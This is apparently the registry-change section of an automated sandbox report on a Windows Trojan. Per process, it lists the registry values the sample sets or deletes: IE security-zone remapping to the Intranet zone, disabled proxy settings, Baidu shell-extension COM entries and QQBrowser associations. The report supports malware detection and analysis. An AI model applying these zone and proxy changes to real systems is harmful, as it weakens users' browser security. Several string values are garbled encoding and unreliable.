[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\FM4.0_201410162111\201410162111]
"FHSev.exe" = "ÃƒÂ©Ã…Â¸Ã‚Â³ÃƒÂ¤Ã‚Â¹Ã‚ÂÃƒÂ©Ã¢â€šÂ¬Ã…Â¡ÃƒÂ§Ã¢â‚¬ÂÃ‚Â¨ÃƒÂ¦Ã‚Â£Ã¢â€šÂ¬ÃƒÂ¦Ã‚ÂµÃ¢â‚¬Â¹ÃƒÂ¦Ã…Â Ã‚Â¥ÃƒÂ¥Ã¢â‚¬ËœÃ…Â "

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 19 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E C4 A0 2A C8 E0 87 BA 8F 11 C8 59 44 0E BD 19"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process BDKVWsc.exe:3212 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7D AC E7 B8 C6 9C 8B 17 A0 A8 17 08 FE C1 AA A3"

The process RegSvr32.exe:3252 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C3 C6 FC D6 1F FB FE CF 70 75 49 52 00 A1 23 9E"

The process RegSvr32.exe:3248 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCR\TypeLib\{45D1EEF3-7713-48FA-B7A5-B77229C7D330}\1.0]
"(Default)" = "BDShellExt 1.0 Type Library"

[HKCR\BDShellExt.BDShellExtMenu\CurVer]
"(Default)" = "BDShellExt.BDShellExtMenu.1"

[HKCR\Interface\{0C5C9741-79A4-4A5F-A9B3-9E686CFF879B}\NumMethods]
"(Default)" = "3"

[HKCR\Interface\{0C5C9741-79A4-4A5F-A9B3-9E686CFF879B}]
"(Default)" = "IBDShellExtMenu"

[HKCR\Interface\{0C5C9741-79A4-4A5F-A9B3-9E686CFF879B}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\TypeLib\{45D1EEF3-7713-48FA-B7A5-B77229C7D330}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\CLSID\{0C5C9741-79A4-4A5F-A9B3-9E686CFF879B}\InProcServer32]
"(Default)" = "%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDShellExt.dll"

[HKCR\BDShellExt.BDShellExtMenu.1]
"(Default)" = "BDShellExtMenu Class"

[HKCR\BDShellExt.BDShellExtMenu]
"(Default)" = "BDShellExtMenu Class"

[HKCR\CLSID\{00890530-6A9F-4be2-B1BB-73F01E2BB986}\InprocServer32]
"(Default)" = "%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDShellExt.dll"

[HKCR\BDShellExt.BDShellExtMenu.1\CLSID]
"(Default)" = "{00890530-6A9F-4be2-B1BB-73F01E2BB986}"

[HKCR\lnkfile\shellex\ContextMenuHandlers\BDShellExt]
"(Default)" = "{00890530-6A9F-4be2-B1BB-73F01E2BB986}"

[HKCR\AppID\BDShellExt.DLL]
"AppID" = "{FBE0E29B-01DB-4876-B147-46F5AABA6823}"

[HKCR\Interface\{0C5C9741-79A4-4A5F-A9B3-9E686CFF879B}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved]
"{00890530-6A9F-4be2-B1BB-73F01E2BB986}" = "BDShellExtMenu Class"

[HKCR\BDShellExt.BDShellExtMenu\CLSID]
"(Default)" = "{00890530-6A9F-4be2-B1BB-73F01E2BB986}"

[HKCR\CLSID\{00890530-6A9F-4be2-B1BB-73F01E2BB986}\TypeLib]
"(Default)" = "{45D1EEF3-7713-48fa-B7A5-B77229C7D330}"

[HKCR\Interface\{0C5C9741-79A4-4A5F-A9B3-9E686CFF879B}\TypeLib]
"(Default)" = "{45D1EEF3-7713-48FA-B7A5-B77229C7D330}"

[HKCR\CLSID\{00890530-6A9F-4be2-B1BB-73F01E2BB986}\VersionIndependentProgID]
"(Default)" = "BDShellExt.BDShellExtMenu"

[HKCR\CLSID\{00890530-6A9F-4be2-B1BB-73F01E2BB986}\ProgID]
"(Default)" = "BDShellExt.BDShellExtMenu.1"

[HKCR\AllFilesystemObjects\shellex\ContextMenuHandlers\BDShellExt]
"(Default)" = "{00890530-6A9F-4be2-B1BB-73F01E2BB986}"

[HKCR\CLSID\{0C5C9741-79A4-4A5F-A9B3-9E686CFF879B}]
"(Default)" = "PSFactoryBuffer"

[HKCR\AppID\{FBE0E29B-01DB-4876-B147-46F5AABA6823}]
"(Default)" = "BDShellExt"

[HKCR\TypeLib\{45D1EEF3-7713-48FA-B7A5-B77229C7D330}\1.0\0\win32]
"(Default)" = "%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDShellExt.dll"

[HKCR\CLSID\{00890530-6A9F-4be2-B1BB-73F01E2BB986}]
"AppID" = "{FBE0E29B-01DB-4876-B147-46F5AABA6823}"

[HKCR\CLSID\{0C5C9741-79A4-4A5F-A9B3-9E686CFF879B}\InProcServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "61 A2 A1 36 60 96 16 D8 E1 84 AB EE 91 A3 CB 0C"

[HKCR\Folder\shellex\ContextMenuHandlers\BDShellExt]
"(Default)" = "{00890530-6A9F-4be2-B1BB-73F01E2BB986}"

[HKCR\CLSID\{00890530-6A9F-4be2-B1BB-73F01E2BB986}]
"(Default)" = "BDShellExtMenu Class"

[HKCR\TypeLib\{45D1EEF3-7713-48FA-B7A5-B77229C7D330}\1.0\HELPDIR]
"(Default)" = ""

[HKCR\Interface\{0C5C9741-79A4-4A5F-A9B3-9E686CFF879B}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{00890530-6A9F-4be2-B1BB-73F01E2BB986}\InprocServer32]
"ThreadingModel" = "Apartment"

The process bddownloader.exe:3224 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"regsvr32.exe" = "Microsoft(C) Register Server"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\TypeLib\{DA624F8F-98BF-4B03-AD11-A12D07119E81}\1.0\0\win32]
"(Default)" = "c:\program files\common files\baidu\bddownload\106\bddownloader.exe"

[HKCR\BDDownloadProxy.Downloader\CLSID]
"(Default)" = "{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}\ProxyStubClsid32]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\TypeLib]
"(Default)" = "{DA624F8F-98BF-4B03-AD11-A12D07119E81}"

[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}\LocalServer32]
"(Default)" = "c:\program files\common files\baidu\bddownload\106\bddownloader.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\BDDownloadProxy.Downloader.1]
"(Default)" = "Downloader Class"

[HKCR\BDDownloadProxy.Downloader.1\CLSID]
"(Default)" = "{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}"

[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}\ProxyStubClsid]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\BDDownloadProxy.Downloader]
"(Default)" = "Downloader Class"

[HKCR\AppID\{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}]
"(Default)" = "DownloadProxy"

[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}]
"(Default)" = "Downloader Class"

[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}\ProgID]
"(Default)" = "BDDownloadProxy.Downloader.1"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"netsh.exe" = "Network Command Shell"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\TypeLib]
"Version" = "1.0"

[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}\TypeLib]
"(Default)" = "{DA624F8F-98BF-4B03-AD11-A12D07119E81}"

[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}\TypeLib]
"Version" = "1.0"

[HKCR\AppID\DownloadProxy.EXE]
"AppID" = "{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}"

[HKCR\TypeLib\{DA624F8F-98BF-4B03-AD11-A12D07119E81}\1.0\HELPDIR]
"(Default)" = ""

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "61 BF 0A 4D DB A6 36 18 D5 AD D4 6C 84 64 C1 05"

[HKCR\BDDownloadProxy.Downloader\CurVer]
"(Default)" = "BDDownloadProxy.Downloader.1"

[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}\TypeLib]
"(Default)" = "{DA624F8F-98BF-4B03-AD11-A12D07119E81}"

[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}]
"(Default)" = "_IDownloaderEvents"

[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}]
"AppID" = "{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}"

[HKCR\TypeLib\{DA624F8F-98BF-4B03-AD11-A12D07119E81}\1.0]
"(Default)" = "DownloadProxy 1.0 Type Library"

[HKCR\TypeLib\{DA624F8F-98BF-4B03-AD11-A12D07119E81}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}\VersionIndependentProgID]
"(Default)" = "BDDownloadProxy.Downloader"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}]
"(Default)" = "IDownloader"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process QQBrowser.exe:1848 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B5 6C 07 78 1A A0 CD A4 7B BE 0D C1 57 FE 84 58"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

The process QQBrowser.exe:2600 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Classes\ftp\shell\open\ddeexec]
"(Default)" = ""

[HKCU\Software\Classes\ftp\DefaultIcon]
"(Default)" = "%Program Files%\Tencent\QQBrowser\QQBrowser.exe,0"

[HKCU\Software\Classes\https\shell]
"(Default)" = "open"

[HKCU\Software\Classes\ftp\shell]
"(Default)" = "open"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Classes\http\shell]
"(Default)" = "open"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Classes\http\DefaultIcon]
"(Default)" = "%Program Files%\Tencent\QQBrowser\QQBrowser.exe,0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Classes\ftp\shell\open\command]
"(Default)" = "%Program Files%\Tencent\QQBrowser\QQBrowser.exe -- %1"

[HKCU\Software\Classes\https\shell\open\ddeexec]
"(Default)" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "81 D8 FE 00 01 E2 7C 2A A5 4A 72 47 3E 46 61 B4"

[HKCU\Software\Classes\http\shell\open\ddeexec]
"(Default)" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Classes\https\DefaultIcon]
"(Default)" = "%Program Files%\Tencent\QQBrowser\QQBrowser.exe,0"

[HKCU\Software\Classes\https\shell\open\command]
"(Default)" = "%Program Files%\Tencent\QQBrowser\QQBrowser.exe -- %1"

[HKCU\Software\Classes\http\shell\open\command]
"(Default)" = "%Program Files%\Tencent\QQBrowser\QQBrowser.exe -- %1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process QQBrowser.exe:2916 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "39 B3 A5 CE A0 AB F3 EB 27 7D DE 86 E3 66 BC 90"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

The process QQBrowser.exe:3364 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Tencent\QQBrowser\Extensions\{F0771800-9DCB-4360-A99A-D5509DA510CD}\2.0.0.11\BackgroundPage]
"Path" = "background.html"

[HKCU\Software\Tencent\QQBrowser\Extensions\{F0771800-9DCB-4360-A99A-D5509DA510CD}\2.0.0.11\Commands\qzone_share_page]
"CommandActionParameter" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Tencent\QQBrowser\Extensions\{F0771800-9DCB-4360-A99A-D5509DA510CD}\2.0.0.11]
"RequiredMinVersion" = "7.7.0.22492"

[HKCU\Software\Tencent\QQBrowser\Extensions\{F0771800-9DCB-4360-A99A-D5509DA510CD}\2.0.0.11\PluginBar]
"ToolTips" = "QQÃƒÂ§Ã‚Â©Ã‚ÂºÃƒÂ©Ã¢â‚¬â€Ã‚Â´ÃƒÂ¦Ã‚ÂÃ‚ÂÃƒÂ©Ã¢â‚¬Â Ã¢â‚¬â„¢\r\nÃƒÂ§Ã¢â‚¬Å¡Ã‚Â¹ÃƒÂ¥Ã¢â‚¬Â¡Ã‚Â»ÃƒÂ§Ã¢â€žÂ¢Ã‚Â»ÃƒÂ¥Ã‚Â½Ã¢â‚¬Â¢"

[HKCU\Software\Tencent\QQBrowser\Extensions\{F0771800-9DCB-4360-A99A-D5509DA510CD}\2.0.0.11\ContextMenus\qzone_share_page]
"CommandOrder" = "0"

[HKCU\Software\Tencent\QQBrowser\Extensions\{F0771800-9DCB-4360-A99A-D5509DA510CD}]
"CommandOrder" = "0"

[HKCU\Software\Tencent\QQBrowser\Extensions\{F0771800-9DCB-4360-A99A-D5509DA510CD}\2.0.0.11]
"STYLE" = "37"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Tencent\QQBrowser\Extensions\{F0771800-9DCB-4360-A99A-D5509DA510CD}\2.0.0.11]
"ManifestVersion" = "1"
"LogoPath" = "logo.png"

[HKCU\Software\Tencent\QQBrowser\Extensions]
"CommandOrder" = "1"

[HKCU\Software\Tencent\QQBrowser\Extensions\{F0771800-9DCB-4360-A99A-D5509DA510CD}\2.0.0.11\Commands\qzone_share_page]
"CommandActionType" = "BackgroundPage"

[HKCU\Software\Tencent\QQBrowser\Extensions\{F0771800-9DCB-4360-A99A-D5509DA510CD}\2.0.0.11]
"Name" = "QQÃƒÂ§Ã‚Â©Ã‚ÂºÃƒÂ©Ã¢â‚¬â€Ã‚Â´ÃƒÂ¦Ã‚ÂÃ‚ÂÃƒÂ©Ã¢â‚¬Â Ã¢â‚¬â„¢ Beta"
"Version" = "2.0.0.11"
"Desc" = "ÃƒÂ¤Ã‚Â¸Ã¢â€šÂ¬ÃƒÂ©Ã¢â‚¬ÂÃ‚Â®ÃƒÂ¨Ã‚Â®Ã‚Â¿ÃƒÂ©Ã¢â‚¬â€Ã‚Â®ÃƒÂ§Ã‚Â©Ã‚ÂºÃƒÂ©Ã¢â‚¬â€Ã‚Â´ÃƒÂ¯Ã‚Â¼Ã…â€™ÃƒÂ¥Ã‚Â¥Ã‚Â½ÃƒÂ¥Ã‚ÂÃ¢â‚¬Â¹ÃƒÂ¥Ã…Â Ã‚Â¨ÃƒÂ¦Ã¢â€šÂ¬Ã‚ÂÃƒÂ¦Ã‚ÂÃ‚ÂÃƒÂ©Ã¢â‚¬Â Ã¢â‚¬â„¢ÃƒÂ¯Ã‚Â¼Ã…â€™ÃƒÂ¥Ã‚Â¿Ã‚Â«ÃƒÂ©Ã¢â€šÂ¬Ã…Â¸ÃƒÂ¥Ã‹â€ Ã¢â‚¬Â ÃƒÂ¤Ã‚ÂºÃ‚Â«ÃƒÂ§Ã‚Â½Ã¢â‚¬ËœÃƒÂ©Ã‚Â¡Ã‚Âµ"

[HKCU\Software\Tencent\QQBrowser\Extensions\{F0771800-9DCB-4360-A99A-D5509DA510CD}\2.0.0.11\ContextMenus\qzone_share_page]
"CommandActionType" = "BackgroundPage"

[HKCU\Software\Tencent\QQBrowser\Extensions\{F0771800-9DCB-4360-A99A-D5509DA510CD}\2.0.0.11]
"HomeUrl" = "http://app.browser.qq.com?id={F0771800-9DCB-4360-A99A-D5509DA510CD}"

[HKCU\Software\Tencent\QQBrowser\Extensions\{F0771800-9DCB-4360-A99A-D5509DA510CD}]
"currentVersion" = "2.0.0.11"

[HKCU\Software\Tencent\QQBrowser\Extensions\{F0771800-9DCB-4360-A99A-D5509DA510CD}\2.0.0.11\ContextMenus\qzone_share_page]
"CommandId" = "qzone_share_page"

[HKCU\Software\Tencent\QQBrowser\Extensions\{F0771800-9DCB-4360-A99A-D5509DA510CD}\2.0.0.11\BackgroundPage]
"LoadingTime" = "LoadAsInited"

[HKCU\Software\Tencent\QQBrowser\Extensions\{F0771800-9DCB-4360-A99A-D5509DA510CD}\2.0.0.11\PluginBar]
"LightIcon" = "images/toolbar_btn_Qzone_light1.png:3"

[HKCU\Software\Tencent\QQBrowser\Extensions\{F0771800-9DCB-4360-A99A-D5509DA510CD}\2.0.0.11]
"ID" = "{F0771800-9DCB-4360-A99A-D5509DA510CD}"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "80 7A 0D 15 4F 1F 0B C4 74 F7 4A 45 31 75 22 F9"

[HKCU\Software\Tencent\QQBrowser\Extensions\{F0771800-9DCB-4360-A99A-D5509DA510CD}\2.0.0.11\ContextMenus\qzone_share_page]
"CommandName" = "ÃƒÂ¥Ã‹â€ Ã¢â‚¬Â ÃƒÂ¤Ã‚ÂºÃ‚Â«ÃƒÂ¥Ã‚Â½Ã¢â‚¬Å“ÃƒÂ¥Ã¢â‚¬Â°Ã‚ÂÃƒÂ§Ã‚Â½Ã¢â‚¬ËœÃƒÂ©Ã‚Â¡Ã‚ÂµÃƒÂ¥Ã‹â€ Ã‚Â°QQÃƒÂ§Ã‚Â©Ã‚ÂºÃƒÂ©Ã¢â‚¬â€Ã‚Â´"

[HKCU\Software\Tencent\QQBrowser\Extensions\{F0771800-9DCB-4360-A99A-D5509DA510CD}\2.0.0.11\PluginBar]
"DarkIcon" = "images/toolbar_btn_Qzone_dark1.png:3"

The process QQBrowser.exe:3860 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCR\QQBrowser.Protocol]
"(Default)" = "QQBrowser Protocol"

[HKCR\CLSID\{0002DF01-0000-0000-C000-000000000046}\LocalServer32]
"(Default)" = "%Program Files%\Internet Explorer\iexplore.exe"

[HKCR\Tencent.QQBrowser.Default\.exe\shell\open\command]
"(Default)" = "%Program Files%\Tencent\QQBrowser\QQBrowser.exe %*"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQBrowser.exe]
"DisableExceptionChainValidation" = "0"

[HKLM\SOFTWARE\Tencent\QQBrowser\Capabilities\URLAssociations]
"http" = "QQBrowser.Protocol"

[HKCU\Software\Tencent\QQBrowser\InstallInfo]
"DefaultBrower" = "%Program Files%\Internet Explorer\iexplore.exe"

[HKCR\QQBrowser.Protocol\shell\open\command]
"(Default)" = "%Program Files%\Tencent\QQBrowser\QQBrowser.exe -- %1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCR\QQBrowser.File\shell\open\command]
"(Default)" = "%Program Files%\Tencent\QQBrowser\QQBrowser.exe -- %1"

[HKCR\Tencent.QQBrowser.Default\.exe\shell]
"(Default)" = "open"

[HKLM\SOFTWARE\Tencent\QQBrowser\Capabilities\FileAssociations]
".xhtml" = "QQBrowser.File"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\RegisteredApplications]
"QQBrowser" = "Software\Tencent\QQBrowser\Capabilities"

[HKCU\Software\Tencent\QQBrowser\InstallInfo]
"FirstLaunch" = "1"

[HKLM\SOFTWARE\Tencent\QQBrowser\Capabilities\FileAssociations]
".xht" = "QQBrowser.File"

[HKCR\QQBrowser.Protocol\shell]
"(Default)" = "open"

[HKLM\SOFTWARE\Tencent\QQBrowser\CurrentVersion\App Paths\QQBrowser.exe]
"(Default)" = "%Program Files%\Tencent\QQBrowser\QQBrowser.exe"

[HKCR\QQBrowser.Protocol\DefaultIcon]
"(Default)" = "%Program Files%\Tencent\QQBrowser\QQBrowser.exe,0"

[HKCR\QQBrowser.File]
"URL Protocol" = ""

[HKCR\QQBrowser.File\shell]
"(Default)" = "open"

[HKLM\SOFTWARE\Tencent\QQBrowser\Capabilities\FileAssociations]
".mht" = "QQBrowser.File"
".mhtml" = "QQBrowser.File"

[HKCR\Tencent.QQBrowser.Default\.exe\shell\run\command]
"(Default)" = "%Program Files%\Tencent\QQBrowser\QQBrowser.exe %*"

[HKLM\SOFTWARE\Tencent\QQBrowser\Capabilities\FileAssociations]
".shtml" = "QQBrowser.File"

[HKCR\QQBrowser.File]
"AppUserModelID" = "Tencent.QQBrowser.Default"

[HKCR\QQBrowser.Protocol]
"URL Protocol" = ""

[HKLM\SOFTWARE\Tencent\QQBrowser\Capabilities\FileAssociations]
".htm" = "QQBrowser.File"

[HKCR\QQBrowser.Protocol]
"AppUserModelID" = "Tencent.QQBrowser.Default"

[HKCR\QQBrowser.File\DefaultIcon]
"(Default)" = "%Program Files%\Tencent\QQBrowser\QQBrowser.exe,0"

[HKLM\SOFTWARE\Tencent\QQBrowser\Capabilities\FileAssociations]
".html" = "QQBrowser.File"

[HKCR\QQBrowser.File]
"(Default)" = "QQBrowser HTML Document"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B6 CD B8 6E A7 A4 3E 0F 06 F1 B7 70 D3 81 5C FC"

[HKLM\SOFTWARE\Tencent\QQBrowser\Capabilities\URLAssociations]
"https" = "QQBrowser.Protocol"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\QQBrowser.exe]
"Path" = "%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser"

[HKLM\SOFTWARE\Tencent\QQBrowser\Capabilities]
"ApplicationName" = "QQBrowser"

[HKCU\Software\Tencent\QQBrowser\http\shell\open\command]
"(Default)" = "%Program Files%\Internet Explorer\iexplore.exe -nohome"

[HKLM\SOFTWARE\Tencent\QQBrowser\Capabilities\URLAssociations]
"ftp" = "QQBrowser.Protocol"

[HKLM\SOFTWARE\Tencent\QQBrowser\Capabilities]
"ApplicationDescription" = "QQBrowser"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQBrowser.exe]
"GlobalFlag"
"PageHeapFlags"

